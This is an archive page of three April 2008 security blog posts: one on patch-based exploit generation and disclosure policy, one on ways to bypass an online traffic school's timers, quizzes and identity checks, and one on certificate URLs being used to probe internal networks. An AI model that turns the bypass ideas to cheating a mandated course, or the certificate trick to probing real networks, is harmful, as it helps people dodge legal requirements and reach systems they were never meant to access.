SYSSEC: April 2008 Archives

 

April 21, 2008

In any cost/benefit analysis of vulnerability policy, we have to factor in the impact of exploitation that results from fixing the vulnerability. In particular, if you provide a full description of the vulnerability at the same time as you patch it, then it's generally easy for an attacker to construct an exploit. Since patch distribution and installation can take between hours and weeks, this gives the attacker a significant window of opportunity to mount attacks before people patch their machines.

A natural response to this is to simply release patches but not descriptions of vulnerabilities, on the theory that the patches disclose less. It's obvious that this isn't true with open source systems, since it's trivial to examine a given change and determine what attack it's designed to stop, but there have also been reports that attackers reverse engineer binary patches (in some cases within hours) to construct exploits. In this year's USENIX, Brumley et al. take this to its logical conclusion and describe a technique for automatically generating exploits based on patches. This doesn't really change the situation much as far as I can tell; it was widely believed this was possible, and while this tool takes seconds to minutes instead of hours, it was never plausible that you'd get complete patch deployment inside of 12-24 hours anyway, so shaving a few hours off the attacker time may not make much of a difference.

The authors describe a number of techniques (obfuscation, encrypted patches, P2P patch distribution) one might imagine using to reduce the impact of fast attack generation, and conclude (correctly IMO) they're not that likely to work. As I understand it, the critical path item in patch installation for important systems isn't obtaining the patch but testing it on sacrificial systems to make sure it doesn't introduce instability, and that creates an inherent lag that probably can't be removed with a new distribution method.

Another alternative (though it goes against the trend in recent practice) is to be less aggressive about releasing patches for vulnerabilities that haven't already been disclosed. The faster that attackers can respond to new vulnerabilities by comparison to defenders, the more that fixes released in an orderly fashion look like zero-day vulnerabilities and so the less attractive it looks to fix vulns that aren't generally known (Res04 has some analysis of this issue.)

 

April 6, 2008

Title: On the security of traffic school After a recent ticket (received while on a conference call, believe it or not), I opted for traffic school. In Santa Clara County, if you want Web traffic school, you need to take it from DriversEd.com. Luckily, as of 2008 you no longer need to go in and take a final exam in person; you can do the whole thing online, which makes the process comparatively painless.

Unsurprisingly, DriversEd.com has some features designed to ensure you receive the full educational value of the traffic school experience:

  • Timers that require you to stay on a page for a specified amount of time.
  • Intermediate tests.
  • Security questions (e.g., what's the last four digits of your SSN).

Of course, as a security guy the first thing I think about is how to bypass this stuff. The timers are easy: they're in JavaScript. If you run your browser without JavaScript they go away, so you can in principle zip through the pages as fast as you want. I didn't see any evidence this was enforced on the server side.

Of course, then you're not paying attention, so you may have some trouble with the intermediate tests. Luckily, if you get an answer wrong, they give you the right answer and then give you a slightly different selection of questions, but with a lot of overlap with the previous ones. I wasn't brave enough to try this, since there might be some limited try feature, but it looks like you could just fail your way to having all the answers. And, of course you could Google the answers. So, clearly, one could just zip through all the pages and then flail through the self-test.

The security questions are obviously designed to stop you from outsourcing the task of taking the class to someone else. You'd need to give them some personal information. Most of it (weight, DL#, height, DOB, zip code) isn't really private. You might not want to give your contract click monkey your SSN, though. Weirdly, the registration program prompts you for this stuff, even though a lot of it is on your license. I wonder if you could just type fake answers, in which case you would presumably be OK with having someone do it for you.

If you were willing to do some programming work, you could probably just screen scrape the pages, clicking through the instructional pages, picking out the self tests and answering them by random guessing + corrections (nicely highlighted in red and green), and then answering the security questions. With some luck, I suspect I could do this in about 20% more time than it would take to just go through the class the old fashioned way. That's what a real programmer would do.

 

April 3, 2008

Martin Rex points to this whitepaper about a claimed security flaw in RFC 3280 (the RFC for X.509/PKIX certificates). The issue is that certificates can contain a variety of URLs, including:
  • Intermediate certificates (for the signer of this cert).
  • Pointers to the certificate policy statement
  • Pointers to where you can get a CRL
  • Pointers to an OCSP server

When your client goes to validate the certificate, it may (automatically) try to retrieve what's on the other end of the URL. Arguably, this is bad:

However, elegant does not usually mean secure. The problem in this case is that until the certificate chain is verified, the user sending the certificate is usually untrusted. This means that the specified URI has to be treated as potentially evil input from an unauthenticated user. This simple fact is missing from the "Security Considerations" section of the RFC and thus implementors have gotten it wrong.

When implemented naively, this means that an unauthenticated user can embed arbitrary URIs within a certificate and can thus force the verifier to send out arbitrary HTTP requests on its behalf -- for example to networks formerly unreachable to an attacker. The response itself is not forwarded to the attacker, so he is limited to blind attacks. A specific case of this can be used to gain information about the verifier -- for example whether he has opened a certain email or office document. As more than one URI can be embedded in the certificate, it would also theoretically be possible to gain information on internal networks using timing information. For this, one would create a certificate with one URI controlled by the attacker, one URI internal to the attacked, one URI controlled by the attacker and measure the timing distance between the two accesses to the attacker-controlled URIs. In practical experience, this is still theoretical, though.

This certainly is technically true, but it's unclear how serious this issue is. After all, if your mail client is willing to read HTML mail (and many are) and if it automatically retrieves inline images (many do), then it's pretty easy for the sender to verify that you read a given message, and potentially mount the timing attacks these researchers describe (though it's an open question whether this would work.) There are actually a number of protocols that have automatic URL dereference built in.

There's actually something more interesting, though tricky to exploit (and harder to deal with) here. The white paper talks about probing internal servers, but depending on what services are running there and what ports they're running on, there's some possibility that the client (presumably behind the firewall) could talk to the internal server and do more than detect it. Theoretically, it might be able to give it instructions that it would follow. How well this actually works depends a lot on what the internal service you're talking to is. The attacker doesn't get much control of the message it sends to the server, it just gets to embed the URL in some HTTP GET request. Obviously, since the client is talking HTTP, it would be most convenient if you were talking to an HTTP server, since you'd be protocol compliant. In theory, HTTP GETs are not supposed to have side effects on the server, but of course that happens all the time.

If the server isn't HTTP, then you have to get pretty lucky. You need to be able to encode a meaningful protocol request in the URI and the server needs to be resilient enough to nonconformant traffic that it's willing to ignore the bogus HTTP request wrapper and process whatever request is embedded in the URI. This obviously isn't superconvenient for the attacker, who would like a much finer degree of control of the protocol messages, like you'd get with a client-side program (hence the browser same origin policy).